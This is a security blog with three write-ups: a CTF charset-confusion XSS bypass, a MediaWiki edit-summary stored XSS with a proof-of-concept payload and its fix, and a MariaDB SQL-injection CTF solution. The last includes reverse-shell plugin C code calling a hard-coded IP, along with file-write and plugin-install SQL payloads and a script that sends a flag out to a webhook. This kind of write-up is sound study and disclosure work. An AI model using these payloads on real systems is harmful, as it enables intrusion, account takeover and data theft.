So during the algorithm for determining a character encoding (charset), browsers can choose to only apply it to the first part of the document if all the bytes of the document are not yet available.

More concretely, this means that for a data: url, the character encoding algorithm applies to the whole document as the document is available immediately. For a network load, it does not.

In our challenge, the validation bot loads from a data: url. The report bot loads from network. This seems like something we can exploit.

Charset confusion

I've heard of character set confusion before, but usually in the context of different systems supporting different character sets. For example, where the validator supports UTF-7 which has a non-ascii compatible encoding of <, but web browsers do not support it and interpret the document with an unknown charset as UTF-8.

However this is a bit different, since the validator and the ultimate viewer are the same program - both are web browsers, supporting the exact same charsets.

We need to find two character encodings that interpret the same document different ways - one with the CSP policy and one without, and have both character encodings be supported by modern web browsers.

What character sets can we even possibly specify? First off we can discard any encodings that always encode <, > and " the way ASCII would, which includes all single-byte legacy encodings. Browsers have intentionally removed support for most encodings that are not ASCII-compatible, due to the problems caused by encodings like UTF-7 and HZ. Per the encoding standard, the only ones left are the following legacy multi-byte encodings: big5, EUC-JP, ISO-2022-JP, Shift_JIS, EUC-KR, UTF-16BE, UTF-16LE.

Looking through their definitions in the encoding standard, ISO-2022-JP stands out because it is stateful. In the other encodings, a specific byte might affect the interpretation of the next few bytes, but with ISO-2022-JP, a series of bytes can affect the meaning of the entire rest of the text.

ISO-2022-JP is not really a single encoding, but 3 encodings that can be switched between each other with a special code. When in ascii mode, the encoding looks like normal ascii. But when in "katakana" mode, the same bytes get interpreted as Japanese characters.

This seems ideal for the purposes of creating a polyglot document, as we can switch the modes on and off to change the meaning of a wide swath of text.

An Example

Note: throughout this post I will be using ^[ to refer to the ASCII escape character (0x1B). If you want to try these out as data: urls, replace the ^[ with %1B

Consider the following HTML snippet:

<html><head><!-- ^[$BNq --><script>alert('here');</script><!-- ^[(B--></head></html>

When using a normal encoding like windows-1252 (aka ISO-8859-1) or UTF-8, the document looks just like you see above, just with the ^[ replaced with an unprintable character.

When viewed under the ISO-2022-JP encoding, it looks like:

<html><head><!-- 暦�⑬昭黹鱸頸鍾跂鶯├蒹鱚З纂�竰蜷�次⑬�--></head></html>

The ^[$BNq sequence changes the charset mode to katakana, ^[(B changes it back to ASCII. Under windows-1252 these escape sequences are ignored, of course. Thus we have made a polyglot document that will give an alert box only in windows-1252 mode.

If you want to try yourself:

data:text/html;charset=windows-1252,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

vs

data:text/html;charset=iso-2022-jp,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

 Note how the body of the url is exactly the same. The only thing that is different is the charset specified in the mime type of the url, which totally changes the interpretation.
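The same effect can be reproduced outside the browser. The following is a minimal Python sketch, assuming Python's cp1252 and iso2022_jp codecs are close enough stand-ins for the browser decoders. They are not identical, so the exact junk characters will differ from what Chrome shows.

```python
# Decode the same bytes under two charsets and check whether <script> survives.
ESC = b"\x1b"

DOCUMENT = (
    b"<html><head><!-- " + ESC + b"$BNq -->"
    b"<script>alert('here');</script>"
    b"<!-- " + ESC + b"(B--></head></html>"
)


def decode_as(charset: str) -> str:
    # errors="replace" turns byte pairs with no mapping into U+FFFD
    # instead of raising an exception.
    return DOCUMENT.decode(charset, errors="replace")


as_1252 = decode_as("cp1252")
as_jp = decode_as("iso2022_jp")

print("script tag visible as windows-1252:", "<script>" in as_1252)
print("script tag visible as ISO-2022-JP:", "<script>" in as_jp)
```

The bytes are identical in both calls. Only the decoder changes, which is the same situation as the two data: urls above.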

Exploiting the detection algorithm

We now have the ability to make HTML that is very different depending on charset, but how do we make sure it is interpreted with different charsets in different contexts?

If we recall from the problem description - the validator loads the page via a data: url, which loads the full page instantly. The victim loads the page over the network.

In the network case, Chrome will start parsing immediately and guess the charset before the entire document has arrived.

So in theory all we need to do is make the document really long, have the part at the beginning be evil under one charset, add a charset declaration at the end for the other charset which makes the document look good. Browsers loading it all at once will see it as benign, browsers loading it over the network will see it as evil. This might look something like:

<html>
    <head>
        <!-- é - Add a windows-1252 character to make sure early heuristics detect as windows-1252 -->
        <!-- ^[$BNq From this part onwards it is visible only in windows-1252 mode -->
        <script> doSomeEvilStuff();x = new Image(); x.src='https://mywebhook?' + encodeURIComponent(localStorage['flag']); </script>
        <!-- Bunch of junk. Repeat this 3000 times to split amongst multiple packets -->
        <!-- ^[(B After this point, visible in both modes -->
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'">
        <meta charset="iso-2022-jp">
    </head>
<body></body></html>

This should be processed the following way:

  • As a data: url - The browser sees the <meta charset="iso-2022-jp"> tag, processes the whole document in that charset. That means that the <script> tag is interpreted as an html comment in japanese, so is ignored
  • Over the network - The browser gets the first few packets. The <meta charset=..> tag has not arrived yet, so it uses a heuristic to try and determine the character encoding. It sees the é in windows-1252 encoding (We can use the same logic for UTF-8, but it seems the challenge transcodes things to windows-1252 as an artifact of naively using atob() function), and makes a guess that the encoding of the document is windows-1252. Later on it sees the <meta> tag, but it is too late at this point as part of the document is already parsed (note: It appears that chrome deviates from the HTML5 spec here. The HTML5 spec says if a late <meta> tag is encountered, the document should be thrown out and reparsed provided that is possible without re-requesting from the network. Chrome seems to just switch charset at the point of getting the meta tag and continue on parsing). The end result is the first part of the document is interpreted as windows-1252, allowing the <script> tag to be executed.
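The two cases above can be modelled with a toy Python sketch. This is not how Chrome detects encodings: pick_charset() is a hypothetical stand-in that honours a <meta charset> only if it is within the bytes seen so far and otherwise falls back to windows-1252. The payload and the 1024-byte first chunk are also assumptions made for illustration.

```python
import re

ESC = b"\x1b"
EVIL = b"<script>steal()</script>"  # hypothetical payload, 24 bytes long


def build_document(padding_pairs: int = 2000) -> bytes:
    # Everything between ESC $ B and ESC ( B is consumed two bytes at a time
    # by the ISO-2022-JP decoder, so that region is kept at an even length.
    hidden = b" -->" + EVIL + b"<!--" + b"AA" * padding_pairs
    assert len(hidden) % 2 == 0
    return (
        b"<html><head><!-- " + ESC + b"$B" + hidden + ESC + b"(B -->"
        b'<meta charset="iso-2022-jp"></head><body></body></html>'
    )


def pick_charset(available: bytes, fallback: str = "cp1252") -> str:
    # Toy encoding detection: use <meta charset> if it has already arrived,
    # otherwise guess the fallback.
    match = re.search(rb'<meta charset="([^"]+)"', available)
    return match.group(1).decode("ascii") if match else fallback


def script_visible(available: bytes) -> bool:
    text = available.decode(pick_charset(available), errors="replace")
    return "<script>" in text


doc = build_document()
print("whole document at once:", script_visible(doc))
print("first 1024 bytes only: ", script_visible(doc[:1024]))
```

With the whole document available the meta tag wins and the script is swallowed by the comment. With only the first chunk available the fallback charset is used and the script tag is visible.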

So I tried this locally.

It did not work.

It took me quite a while to figure out why. Turns out Chrome will wait a certain amount of time before proceeding with parsing a partial response. The HTML5 spec gives the example of waiting for 500ms or 1024 bytes (whichever comes first), but it is unclear what Chrome actually does. Testing this on localhost of course makes the network much more efficient. The MTU of the loopback interface is 64 KiB, so each packet is much bigger. Everything also happens much faster, so the timeout is much less likely to be reached.

Thus I did another test, where I used a php script, but put <?php flush();sleep(1); ?> in the middle, to force a delay. This worked much better in my testing. Equivalently I probably could have just tested on the remote version of the challenge.
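A roughly equivalent experiment can be set up without PHP. The sketch below uses Python's standard http.server module. The make_handler() and serve() names, the port and the one second delay are all assumptions for illustration, not part of the challenge.

```python
import time
from http.server import BaseHTTPRequestHandler, HTTPServer


def make_handler(first_part: bytes, second_part: bytes, delay: float = 1.0):
    """Build a handler that sends the document in two pieces with a pause."""

    class DelayedHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            # Send the start of the document and push it onto the wire.
            self.wfile.write(first_part)
            self.wfile.flush()
            # Give the browser time to start parsing the partial response.
            time.sleep(delay)
            self.wfile.write(second_part)

    return DelayedHandler


def serve(first_part: bytes, second_part: bytes, port: int = 8000) -> None:
    # Blocks forever; stop it with Ctrl-C.
    handler = make_handler(first_part, second_part)
    HTTPServer(("127.0.0.1", port), handler).serve_forever()
```

Calling serve(doc[:1024], doc[1024:]) with a test document and browsing to http://127.0.0.1:8000/ should then behave more like a slow network load than a plain localhost test does.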

After several hours of debugging, I realized that I had actually solved the problem several hours earlier :(. In any case, the previous snippet worked when run on the remote.

Conclusion

 This was a really fun challenge. It had me reading the HTML5 spec with a fine tooth comb, as well as making many experiments to verify behaviour - the mark of an amazing web chall.

I do find it fascinating that the HTML5 spec says:

Warning: The decoder algorithms describe how to handle invalid input; for security reasons, it is imperative that those rules be followed precisely. Differences in how invalid byte sequences are handled can result in, amongst other problems, script injection vulnerabilities ("XSS").

 

 And yet, Chrome had significant deviations from the spec. For example, <meta> tags (after pre-scan) are supposed to be ignored in <noscript> tags when scripting is enabled, and yet they weren't. <meta> tags are supposed to be taken into account inside <script> tags during pre-scan, and yet they weren't. According to the spec, if a late <meta> tag is encountered, browsers are supposed to either reparse the entire document or ignore it, but according to other contestants chrome does neither and instead switches midstream.

Thanks to Project Sekai for hosting a great CTF.

Saturday, March 30, 2024

MediaWiki edit summary XSS write-up

Back in January, I discovered a stored XSS vulnerability in core MediaWiki (T355538; CVE-2024-34507). Essentially, by setting a specific edit summary when editing a page, you could run javascript (and take over the account of anyone viewing the edit summary, for example on the history page or recentchanges).

MediaWiki core is generally pretty good when it comes to security. There are many sketchy extensions, and sometimes there are issues where an admin might be able to run javascript, but by and large unauthenticated XSS vulns are fairly rare. I think the last one was CVE-2021-44858 from back in 2021. The next one before that was CVE-2017-8815 in 2017, which only applied to wikis configured to have a site language of certain languages (e.g. Serbian and Chinese). At least, those were the ones I found when looking through the list. Hopefully I didn't miss any. In any case, finding XSS triggerable by an unprivileged attacker in MediaWiki core is pretty hard.

So what is the bug? The proof of concept looks like this - Create an edit with the following edit summary:

[[Special:RecentChanges#%1b0000000|link1]] [[PageThatExists#/autofocus/onfocus=alert("xss\n"+document.domain)//|link2]]

This feels a bit random at first glance. How does it work?

The edit summary parser

Whenever you edit a page on MediaWiki, there is a box for your edit summary. This is essentially MediaWiki's version of a commit message.

Very little formatting is allowed in this summary. A major exception is links. You can link to other pages by enclosing the link in [[ and ]].

So this explains a little bit about the proof-of-concept - it involves 2 links. But why 2? It doesn't work with just 1. What is with the weird link targets? They are clearly abnormal, but they also don't look like typical XSS. There are no < or >, there aren't even any unclosed quotes.

Let's take a deeper look at how MediaWiki applies formatting to these edit summaries. The code where all this happens is includes/CommentFormatter/CommentParser.php.

The first thing we might notice is the following line in CommentParser::preprocessInternal: "// \x1b needs to be stripped because it is used for link markers"

In the proof of concept, the first part is [[Special:RecentChanges#%1b0000000|link1]], where %1b appears. This is a good hint that it has something to do with link markers, whatever those are.

Link markers

But what are link markers?

When MediaWiki makes a link, it needs to know whether the page being linked to exists or not, since missing pages use a red colour. The most natural way of doing this is, when encountering a link, to check in the DB whether or not the page exists.

However, there is a problem. When rendering a long page with a lot of links, we have to do a lot of DB lookups. The lookups are simple, but the DB is still on a separate (albeit nearby) server. Each page to look up involves a local network request to fetch the page status. While that is happening, MW just sits and waits. This is all very fast, but even still it adds up a little bit if you have say 500 links on a page.

The solution to this problem was to batch the queries. Instead of immediately looking up the page, MW would put a small link marker in the page at that point and carry on. Once it is finished, it would look up all the links all at once, and then do another pass to replace all the link markers.

So this is what a link marker is, just a little marker to tell MW to come back to this spot later after it figured out if all the links exist. The format of this marker is \x1B<number> (So \x1B0000000 for the first one, \x1B0000001 for the second, and so on). \x1B is the ASCII escape character.
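The two-pass idea can be sketched in a few lines of Python. This is only an illustration of the technique, not MediaWiki's code: render_summary(), the /wiki/ URL prefix, the class="new" styling and the simplified [[target|label]] regex are all assumptions.

```python
import html
import re

MARKER_RE = re.compile("\x1b([0-9]{7})")
LINK_RE = re.compile(r"\[\[([^|\]]+)\|([^\]]+)\]\]")


def render_summary(summary, existing_pages):
    pending = []  # (target, label) for every link seen in pass 1

    def stash(match):
        pending.append((match.group(1), match.group(2)))
        return "\x1b{:07d}".format(len(pending) - 1)

    # Pass 1: escape the text and leave a marker where each link goes.
    text = LINK_RE.sub(stash, html.escape(summary))

    # One batched "query" instead of one lookup per link.
    known = {target for target, _ in pending} & set(existing_pages)

    def fill(match):
        target, label = pending[int(match.group(1))]
        css = "" if target in known else ' class="new"'
        return '<a href="/wiki/{}"{}>{}</a>'.format(target, css, label)

    # Pass 2: swap every marker for the finished link.
    return MARKER_RE.sub(fill, text)


print(render_summary("see [[Main_Page|home]] and [[Nope|missing]]", {"Main_Page"}))
```

Note that pass 2 is a plain regex replacement over already generated HTML, so it has no idea what context a marker is sitting in.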

Back to the PoC

This explains the first part of the proof of concept: [[Special:RecentChanges#%1b0000000|link1]] - the link target is a link marker. The code has a line:

                                // Fix up urlencoded title texts (copied from Parser::replaceInternalLinks)
                                if ( strpos( $match[1], '%' ) !== false ) {
                                        $match[1] = strtr(
                                                rawurldecode( $match[1] ),
                                                [ '<' => '&lt;', '>' => '&gt;' ]
                                        );
                                }


Which normalizes titles using percent encoding to use the real characters. Thus the %1B gets replaced with an actual 0x1B byte. The code did try to strip 0x1B characters earlier, but at that point, it was still just %1b and did not match the check.
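The ordering problem is easy to see in isolation. Below is a minimal Python sketch, assuming urllib.parse.unquote() is a fair analogue of PHP's rawurldecode(). The preprocess() and normalize_target() helpers are hypothetical names, not MediaWiki functions.

```python
from urllib.parse import unquote


def preprocess(summary: str) -> str:
    # Strip raw ESC characters so user input cannot contain a link marker.
    return summary.replace("\x1b", "")


def normalize_target(target: str) -> str:
    # Rough analogue of the rawurldecode() call plus the < and > escaping.
    if "%" in target:
        target = unquote(target).replace("<", "&lt;").replace(">", "&gt;")
    return target


# The strip runs first and finds nothing, then decoding creates the ESC.
target = normalize_target(preprocess("Special:RecentChanges#%1b0000000"))
print(repr(target))
```

The sanitization is applied before the step that introduces the dangerous character, so it never gets a chance to remove it.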

We now have a link with a link marker inside of it. An important note here is that Special:RecentChanges is not a normal page. It is a special page. MediaWiki knows it exists without having to consult the database, so it does not get the link marker treatment. This is important because we cannot use it as a fake link marker if it gets replaced by a real link marker.

At this stage after inserting link markers, the proof of concept becomes the following string:

<a href="/w/index.php/Special:RecentChanges#\x1B0000000" title="Special:RecentChanges">link1</a> \x1B0000000

A link with a link marker inside it!

The second link

The \x1B0000000 is a stand in for [[PageThatExists#/autofocus/onfocus=alert("xss\n"+document.domain)//|link2]].

The replacement at the end is a normal replacement, and everything is fine. However there are now two replacements - there is also the replacement inside the link: href="/w/index.php/Special:RecentChanges#\x1B0000000"

This is the fake link marker that we contrived to get inserted. Unlike the normal link markers, this is inside an attribute. The replacement text assumes it is being inserted as normal HTML, not as an attribute. Since it is a full link that also has quotes inside it, the two layers of quotes will interfere with each other.

Once the replacements happen we get the following mangled HTML for our proof of concept:

<a href="/w/index.php/Special:RecentChanges#<a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>" title="Special:RecentChanges">link1</a> <a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>

This obviously looks wrong, but it's a bit unclear how browsers interpret it. A little known fact about HTML - /'s can separate attributes so long as no equal signs have been encountered yet. After the browser hits the second " mark, it thinks the href attribute is closed and that the remainder is some additional attributes. The browser essentially parses the above html as if it was:

<a href="/w/index.php/Special:RecentChanges#<a href=" w="" index.php="" Test#="" autofocus onfocus="alert(&quot;xss\n&quot;+document.domain)//&quot;" title="Test">link2</a>" title="Special:RecentChanges"&gt;link1</a> <a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>

In other words, an <a> tag, that has an attribute named autofocus and an onfocus event handler. On page load, the link is automatically focused, which triggers the javascript in the onfocus attribute to run, allowing the attacker to do what they want.
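The double replacement described in this section can be reproduced with a short Python sketch. It is a simplified model rather than MediaWiki's code: make_link() and the /wiki/ prefix are assumptions, and the title attribute is left out.

```python
import html
import re

MARKER_RE = re.compile("\x1b([0-9]{7})")


def make_link(target, label):
    return '<a href="/wiki/{}">{}</a>'.format(html.escape(target), html.escape(label))


# First link: a special page, rendered immediately, with a fake marker in its target.
outer = make_link("Special:RecentChanges#\x1b0000000", "link1")
# Second link: an ordinary page, so a real marker is left behind for later.
text = outer + " \x1b0000000"

replacement = make_link('PageThatExists#/autofocus/onfocus=alert("xss")//', "link2")
# The marker pass replaces both occurrences, including the one inside href="...".
mangled = MARKER_RE.sub(lambda m: replacement, text)
print(mangled)
```

Each link is correctly escaped on its own. The problem only appears when one finished link is pasted into the attribute of another.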

Takeaways

I think the major takeaway is that running regexes over partially parsed HTML is always scary. We've had similar issues in the past, for example T110143.

The general pattern we've used to fix this and similar issues, is make sure the replacement token has special characters that would be mangled if it appeared in an unexpected context. Concretely, we added " and ' to the token, which would get escaped if placed in an attribute, and thus no longer matching and no longer being replaced.
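A minimal Python sketch of that pattern follows. The exact token format here is hypothetical (the real one is in the fix for T355538). The point is only that a marker containing " and ' stops matching once it has been through attribute escaping.

```python
import html
import re

# Hypothetical marker format: ESC, a quote pair, seven digits, a quote pair.
MARKER_RE = re.compile("\x1b\"'([0-9]{7})\"'")


def make_marker(index):
    return "\x1b\"'{:07d}\"'".format(index)


def make_link(target, label):
    return '<a href="/wiki/{}">{}</a>'.format(html.escape(target), html.escape(label))


# An attacker-controlled fake marker ends up inside an attribute...
outer = make_link("Special:RecentChanges#" + make_marker(0), "link1")
# ...while the genuine marker sits in normal HTML context.
text = outer + " " + make_marker(0)

fixed = MARKER_RE.sub(lambda m: make_link("Test", "link2"), text)
print(fixed)
```

Only the genuine marker is replaced. The copy inside the href was turned into &quot; and &#x27; entities by the escaping, so the regex no longer recognises it.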

More generally though, I think this is a good example of why even a minimal CSP policy would be helpful.

CSP is a complex standard, that can do a lot of things and has a lot of pieces. One of the things it can do, is disable "unsafe-inline" javascript. This means javascript from attributes (like onfocus) and javascript URLs. Usually this also includes inline <script> tags without a nonce, but that part is optional. A key point here, is this also generally means you cannot execute javascript via .innerHTML anymore, which is a fairly common vector for XSS via javascript.

Normally disabling unsafe-inline would be part of a broader effort to secure javascript, however it's possible to take things a step at a time. This vulnerability would have been stopped just by disabling event attributes. A surprising portion of MediaWiki & extension XSS vulns [Excluding boring - an admin can change something in an unsafe way issues] involve just html attributes (or javascript: urls), which is a web feature that nobody really needs for legit reasons and is generally considered bad practise in normal usage. Even the most minimal CSP policy might really help MediaWiki's overall security posture against XSS vulns.

For more info about the vulnerability, please see the original report at https://phabricator.wikimedia.org/T355538.

Monday, October 23, 2023

CTF Writeup N1CTF 2023: ezmaria

 This weekend I participated in N1CTF. Challenges were quite hard, and other than give-away questions, I only managed to get one: ezmaria. Despite that, I still ended up in 35th place, which I think is a testament to how challenging some of these problems were. Certainly an improvement from 2021 where I came 98th. Maybe next year I'll be able to solve a problem that doesn't have "ez" in the name.



The problem

We are given a website with a clear SQL injection. It takes an id parameter, does a query, and outputs the result.

First things first, let's see what we are dealing with: 0 UNION ALL select 1, version(); reveals that this is 10.5.19-MariaDB+deb11u2. A bit of an old version, but I didn't see any immediately useful CVEs. (MariaDB is a fork of MySQL so the name "mysql" still appears all over the place even though this is MariaDB and not MySQL)

The contest organizers provided a hint: "get shell and run getcap", so presumably the flag is not in the database. Nonetheless, I did poke around information_schema to check what was in the database. There was a fake flag but no real ones.

The text of the website strongly implied that it was written in PHP, so continuing on the trend of ruling out the easy things, I tried the traditional 0 UNION ALL select 1, "<?php passthru( $_REQUEST['c'] ); ?>" INTO OUTFILE "/var/www/html/foo.php";

This gave an error message. It appears that OUTFILE triggered some sort of filter. Trying again with DUMPFILE instead bypasses the filter. However instead MariaDB gives us an error message about file system permissions. No dice. It is interesting though that I got far enough for it to be a filesystem permission error. This implies that our MariaDB user has FILE or SUPER permissions and that secure_file_priv is disabled.

The next obvious step is to try and learn a little bit more about the environment. MariaDB supports a LOAD_FILE to read files. First I tried to read environment variables out of /proc, but that didn't work. The next obvious thing was to fetch the source code of the script generating this page. Since it is implied php, /var/www/html/index.php is a good guess for the path: 0 UNION ALL SELECT load_file( "/var/www/html/index.php" ),1

Index.php


Finally a step forward. This returned the php script in question, which had several interesting things in it.
 
First off 
$servername = "127.0.0.1";
$username = "root";
$password = "123456";
$conn = new mysqli($servername, $username, $password, $dbn);

Always good to know the DB credentials. While not critical, they do become somewhat useful later. Additionally, the fact we are running as the root database user opens up several avenues of attack I wouldn't otherwise have.

// avoid attack
if (preg_match("/(master|change|outfile|slave|start|status|insert|delete|drop|execute|function|return|alter|global|immediate)/is", $_REQUEST["id"])){
    die("你就不能绕一下喵");
}

Good to know what is and isn't being filtered if I need to evade the filter later, although to be honest this didn't really come up when solving the problem.
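To check payloads against the filter before sending them, the regex can be ported to Python. This is a sketch that assumes Python's re.IGNORECASE and re.DOTALL flags match the PHP /is modifiers closely enough for this word list. The is_blocked() helper is a hypothetical name.

```python
import re

# Same word list as the preg_match() call in index.php.
FILTER = re.compile(
    r"(master|change|outfile|slave|start|status|insert|delete|drop|execute"
    r"|function|return|alter|global|immediate)",
    re.IGNORECASE | re.DOTALL,
)


def is_blocked(payload: str) -> bool:
    return FILTER.search(payload) is not None


for payload in (
    '0 UNION ALL select 1, "x" INTO OUTFILE "/var/www/html/foo.php";',
    '0 UNION ALL select 1, "x" INTO DUMPFILE "/var/www/html/foo.php";',
    '0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";',
):
    print(is_blocked(payload), payload)
```

Since the filter is a plain substring match, any keyword that is not on the list, such as DUMPFILE or INSTALL, goes straight through.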

$result = $conn->multi_query($cmd);

This is really interesting. Normally in PHP when using mysqli, you would use $conn->query(), not ->multi_query(). Multi_query supports stacked queries, which means I am not just limited to UNION ALL-ing things, but can use a semi-colon to add additional full queries including verbs other than SELECT.

The script unfortunately will not output the results or errors of these other stacked queries, only those of the first query. This significantly slowed down solving this problem, but more on that later.

Last of all, is the secret command:
//for n1ctf ezmariadb secret cmd

if ($_REQUEST["secret"] === "lolita_love_you_forever"){
    header("Content-Type: text/plain");
    echo "\\n\\n`ps -ef` result\\n\\n";
    system("ps -ef");
    echo "\\n\\n`ls -l /` result\\n\\n";
    system("ls -l /");
    echo "\\n\\n`ls -l /var/www/html/` result\\n\\n";
    system("ls -l /var/www/html/");
    echo "\\n\\n`find /mysql` result\\n\\n";
    system("find /mysql");
    die("can you get shell?");
}


Well, that looks promising, so let's do it!

The secret command

For space, I am going to omit some of the less important parts:

`ps -ef` result

UID          PID    PPID  C STIME TTY          TIME CMD
[..]
root          15      13  0 14:06 ?        00:00:00 su mysql -c mariadbd --skip-grant-tables --secure-file-priv='' --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
mysql         20      15  0 14:06 ?        00:00:00 mariadbd --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
[..]


`ls -l /` result

total 96
[..]
-rw-------   1 root  root    32 Oct 22 14:06 flag
-rwxr-xr-x   1 root  root    84 Sep 18 06:10 flag.sh
drwxr-xr-x   1 mysql mysql 4096 Oct 17 22:35 mysql
-rwx------   1 root  root   160 Oct 17 22:35 mysql.sh
[..]


`find /mysql` result

/mysql
/mysql/plugin
/mysql/data
/mysql/data/ibtmp1
[..]
can you get shell?


So some interesting things here.
 
Presumably the only-root-readable flag file is our target. MariaDB is running as "mysql", thus would not be able to read it. However a hint was given out to run getcap, so presumably capabilities are in play somehow. However this output does not give us any indication as to how, so I guess we'll have to figure that out later.

I was immediately curious about the flag.sh file, but it turns out to be just a script that creates the flag file and removes the flag from the environment variables.
 
An interesting thing to note here, is that mariadbd is run with some non-standard options --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin. We already discovered that secure-file-priv had been disabled, but it seems especially interesting when combined with setting the plugin_dir to a non-standard location that appears to be writable by mariadb. --skip-grant-tables means that MariaDB does not get user information from the internal "mysql" database. Normally in MariaDB there is a special database named mysql that stores internal information including what rights various users have - this option says not to use that database for user rights. The impact of this will become more clear later.
 
We are asked "can you get shell?", and it seems like that is a natural place to focus next.

MariaDB plugins

Setting the plugin directory to a non-standard writable directory is a pretty big hint that plugins are in play, so how do plugins work in MariaDB?

There's a variety of plugin types in MariaDB that do different things. They can add new authentication methods, new SQL functions, change the way the server operates, etc. There's also a concept of server-side vs client-side plugins. A client-side plugin is used with custom authentication schemes from programs like the mariadb command line client. Generally plugins are dynamically loaded compiled shared object (.so or .dll) files.

For server side plugins, they can be enabled in config files, or dynamically via the INSTALL PLUGIN plugin_name SONAME "libwhatever.so"; SQL command. MariaDB then uses dlopen() to load the specified so file.

With all that in mind, a plan forms for how to get shell. It is still unclear where to go from there, since our shell will be running as the mysql user which won't be able to read the flag. The hope is that once we have a shell we can investigate the server more thoroughly and find some way to escalate privileges. In any case, the plan is: Write a plugin that spawns a reverse shell, upload the plugin via the SQL injection using INTO DUMPFILE, enable the plugin and catch the shell with netcat.

Writing a plugin

MariaDB already comes with a lot of plugins, so instead of writing one from scratch I decided to just modify an existing one.

We can download the sources for the debian version of mariadb at https://salsa.debian.org/mariadb-team/mariadb-10.5.git.

I could implement the needed commands in the plugin initialization function, the way a proper plugin would, but it seemed easier to just add a constructor function. This will get executed as soon as MariaDB calls dlopen(), so even if something is wrong with the plugin and MariaDB refuses to load it - as long as it can be linked in, my code will still run.

With that in mind, I added the following to the middle of plugin/daemon_example/daemon_example.cc:
 
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
 
/* Runs as soon as the shared object is loaded via dlopen(). */
__attribute__((constructor))
void shell(void){
  /* Do the work in a child process so the server itself keeps running. */
  if (!fork() ) {
    int port = 8080;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    memset(&revsockaddr, 0, sizeof(revsockaddr));
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("167.172.208.75");

    connect(sockt, (struct sockaddr *) &revsockaddr,
    sizeof(revsockaddr));
    /* Attach stdin, stdout and stderr to the socket. */
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {(char *) "/bin/sh", NULL};
    char * const envp[] = {NULL};
    execve("/bin/sh", argv, envp);
  }
}


The __attribute__((constructor)) tells gcc that this function should run immediately upon dlopen(). It then opens a connection to 167.172.208.75 (my IP address) on port 8080, connecting stdin, stdout, and stderr to the opened socket, and executing /bin/sh thus making a remotely accessible shell. On my own computer I will be running nc -v -l -p 8080 waiting for the connection. Once it connects I will have a shell to the remote server.

I run cmake and make and wait for things to compile. Eventually they do, and we have a nice shiny libdaemon_example.so.
 

Installing the plugin

I convert this to base64, and prepare a file named data containing: 0 UNION ALL SELECT from_base64( "...libdaemon_example.so as base64" ) INTO DUMPFILE "/mysql/plugin/libdaemon_example.so"; and upload it via curl 'http://urlOfChallenge' --data-urlencode id@data.
 
We can confirm it got there safely by doing a query: 0 UNION ALL SELECT 1, md5(load_file( "/mysql/plugin/libdaemon_example.so" ) ); and verifying the hash matches.
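Preparing the data file and the local hash to compare against can be scripted. The following Python sketch mirrors the query text quoted above. The build_upload_query() and local_md5() helpers are hypothetical names, and the four-byte blob only stands in for the real .so file.

```python
import base64
import hashlib


def build_upload_query(blob: bytes, dest: str) -> str:
    # Base64 keeps the binary intact on its way through the id parameter.
    encoded = base64.b64encode(blob).decode("ascii")
    return '0 UNION ALL SELECT from_base64( "{}" ) INTO DUMPFILE "{}";'.format(encoded, dest)


def local_md5(blob: bytes) -> str:
    # Compare this with the md5(load_file(...)) value reported by the server.
    return hashlib.md5(blob).hexdigest()


blob = b"\x7fELF"  # stand-in for the contents of libdaemon_example.so
print(build_upload_query(blob, "/mysql/plugin/libdaemon_example.so"))
print(local_md5(blob))
```

In practice blob would be read from the compiled plugin, and the first line of output written to the file that curl sends with --data-urlencode.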

The hashes match, so it's time to put this into action. I give the SQL: 0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";

And wait in eager anticipation for netcat to report a connection, but the connection never comes.

----

This is where things would be much simpler if our sql injection actually reported errors from stacked queries. Without that we just have to guess what went wrong, and guess I did. Figuring out why it didn't work took hours.

Initially when testing locally it worked totally fine, using the same version of MariaDB with the same options. I even tried on a different version of MariaDB I had installed, where MariaDB refused to load the plugin due to an API mismatch, but nonetheless my code still ran because it was in a constructor function.
 
After bashing my head against it for several hours,I eventually noticed that my file structure looked different than what it did on the server. On my local computer there was a "mysql" database (In the sense of a collection of tables, not in the sense of the program), where the server only had the ctf and information_schema databases. When compiling mariadb locally, I had run an install script that had created the mysql database automatically.

Getting rid of the mysql database, I was able to reproduce the problem locally, and got a helpful error message. It turns out INSTALL PLUGIN uses the mysql.plugin table internally and refuses to run if it isn't present. I dug around the MariaDB sources and found scripts/mysql_system_tables.sql, which had a definition for this table.

This also explains why the --skip-grant-tables option was set. Without this option, MariaDB will abort if the mysql.global_priv table is not present. Hence the option is needed for MariaDB to even run in this setup.

With that in mind, I gave the following commands to the server to create the missing plugin table:

 0;
 CREATE database mysql;
 USE mysql;
 CREATE TABLE IF NOT EXISTS plugin ( name varchar(64) DEFAULT '' NOT NULL, dl varchar(128) DEFAULT '' NOT NULL, PRIMARY KEY (name) ) engine=Aria transactional=1 CHARACTER SET utf8 COLLATE utf8_general_ci comment='MySQL plugins';

Now with the mysql.plugin table existing, let's try this again:

0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";
 
I then look over to my netcat listener:
 
Listening on 0.0.0.0 8080
